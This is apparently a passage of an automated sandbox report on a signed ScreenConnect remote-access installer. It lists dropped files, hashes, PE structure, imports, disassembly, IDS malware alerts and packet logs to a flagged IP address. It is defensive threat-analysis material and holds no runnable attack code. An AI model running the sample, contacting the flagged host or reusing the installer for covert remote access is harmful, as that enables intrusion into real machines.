                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1121
                                                                                                                                                                                                                                                        Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                        MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                        SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                        SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                        SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):4.298812838499693
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:yECqOEmWfd+WQFqy/9026ZTyaRsCDusBqD5dooi8llSD6VJSRh+:fCLL6seqD5SMSWVARc
                                                                                                                                                                                                                                                        MD5:5A27AE1C5F900A7082FEDC0CCCF46543
                                                                                                                                                                                                                                                        SHA1:B750D499F128BFC9D5EB9C2DB15F91AB99ECC685
                                                                                                                                                                                                                                                        SHA-256:8132E692D69D057162E5C6CA97401435F96C811C50A6F941392CC2D5DC9B3E81
                                                                                                                                                                                                                                                        SHA-512:D8017B5345AC0C5E4A123851C3EB61C5EAC8EE11270F52A29CAA2A661D8D92B970CA0CF1539FD0491E35336930C8F7E838CC0FC7CC3FAB6B7280E0771132924E
                                                                                                                                                                                                                                                        Malicious:false
Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...$.'
                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.515515121625994
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:96r3GgxntQ.exe
                                                                                                                                                                                                                                                        File size:83'360 bytes
                                                                                                                                                                                                                                                        MD5:1d59c17159ad086256e0c1c2c34666ae
                                                                                                                                                                                                                                                        SHA1:aaf33cf2f9e970a41535a556dc507e667288ac82
                                                                                                                                                                                                                                                        SHA256:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f
                                                                                                                                                                                                                                                        SHA512:9f850455f91bd6a287e1d112bb0ce66da83fcb0f8ba301635668214e47115f7358f87a160ee5047db340077497bda3c81ce71d9f6bb3fc8b1d21cee144685ce8
                                                                                                                                                                                                                                                        SSDEEP:1536:+oG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYM7Dxh/:2enkyfPAwiMq0RqRfbayZJYYMv/
                                                                                                                                                                                                                                                        TLSH:9D835B53B5D18875E9730E3118B1E9B4593FBE110EA48DAF3398422A0F351D19E3AE7B
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                        Error Number:0
Not Before:17/08/2022 02:00:00
Not After:16/08/2025 01:59:59
                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007FAB6CE8948Ah
                                                                                                                                                                                                                                                        jmp 00007FAB6CE88F3Fh
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                        je 00007FAB6CE890C7h
                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2da0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | 3a86bd3d8ffe94b1ebad64876c0f831c | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.842507933211541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-10-25T19:27:31.624141+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49784 | TCP |
| 2024-10-25T19:27:33.427540+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49796 | TCP |
| 2024-10-25T19:27:38.892228+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49834 | TCP |
| 2024-10-25T19:27:40.793535+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49844 | TCP |
| 2024-10-25T19:27:42.998964+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49859 | TCP |
| 2024-10-25T19:27:47.138118+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49880 | TCP |
| 2024-10-25T19:27:48.713242+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49891 | TCP |
| 2024-10-25T19:27:52.315535+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 79.110.49.185 | 443 | 192.168.2.11 | 49910 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.265784979 CEST49784443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.384955883 CEST4434978479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.384985924 CEST4434978479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.385114908 CEST49784443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.385130882 CEST4434978479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.385186911 CEST49784443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.504544020 CEST4434978479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.504564047 CEST4434978479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.504620075 CEST49784443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:31.504635096 CEST4434978479.110.49.185192.168.2.11
